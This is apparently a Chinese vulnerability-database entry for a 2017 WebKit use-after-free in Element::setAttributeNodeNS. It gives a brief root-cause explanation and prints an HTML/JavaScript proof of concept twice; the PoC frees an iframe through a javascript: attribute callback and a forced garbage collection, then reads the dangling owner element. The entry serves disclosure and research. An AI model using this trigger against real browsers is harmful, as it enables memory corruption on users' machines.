WebKit: Element::setAttributeNodeNS UAF

基本字段

漏洞编号:
SSV-93185
披露/发现时间:
2017-03-15
提交时间:
2017-06-06
漏洞等级:
漏洞类别:
释放后重用
影响组件:
Apple Safari
漏洞作者:
lokihardt
提交者:
Knownsec
CVE-ID:
补充
CNNVD-ID:
补充
CNVD-ID:
补充
ZoomEye Dork:
补充

来源

漏洞详情

贡献者 共获得  0KB

WebKit: Element::setAttributeNodeNS UAF Here's a snippet of Element::setAttributeNodeNS.

ExceptionOr<RefPtr<Attr>> Element::setAttributeNodeNS(Attr& attrNode)
{
...
    setAttributeInternal(index, attrNode.qualifiedName(), attrNode.value(), NotInSynchronizationOfLazyAttribute);

    attrNode.attachToElement(*this);
    treeScope().adoptIfNeeded(attrNode);
    ensureAttrNodeListForElement(*this).append(&attrNode);

    return WTFMove(oldAttrNode);
}

|setAttributeInternal| may execute arbitrary JavaScript. If |setAttributeNodeNS| is called again in |setAttributeInternal|, there will be two |Attr| that has the same owner element and the same name after the first |setAttributeNodeNS| call. One of the |Attr|s will hold the raw pointer of the owner element even if the owner element is freed.

PoC:

<body>
<script>

function gc() {
    for (let i = 0; i < 0x40; i++) {
        new ArrayBuffer(0x1000000);
    }
}

window.callback = () => {
    window.callback = null;

    d.setAttributeNodeNS(src);
    f.setAttributeNodeNS(document.createAttribute('src'));
};

let src = document.createAttribute('src');
src.value = 'javascript:parent.callback()';

let d = document.createElement('div');
let f = document.body.appendChild(document.createElement('iframe'));
f.setAttributeNodeNS(src);
f.remove();
f = null;
src = null;

gc();

alert(d.attributes[0].ownerElement);

</script>
</body>
共 0  兑换了

PoC (非 pocsuite 插件)

贡献者 Knownsec 共获得   0KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
<body>
<script>
function gc() {
for (let i = 0; i < 0x40; i++) {
new ArrayBuffer(0x1000000);
}
}
window.callback = () => {
window.callback = null;
d.setAttributeNodeNS(src);
f.setAttributeNodeNS(document.createAttribute('src'));
};
let src = document.createAttribute('src');
src.value = 'javascript:parent.callback()';
let d = document.createElement('div');
let f = document.body.appendChild(document.createElement('iframe'));
f.setAttributeNodeNS(src);
f.remove();
f = null;
src = null;
gc();
alert(d.attributes[0].ownerElement);
</script>
</body>
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

共 0 兑换

参考链接

解决方案

临时解决方案

暂无临时解决方案

官方解决方案

暂无官方解决方案

防护方案

暂无防护方案

人气 1699
评论前需绑定手机 现在绑定

暂无评论

※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负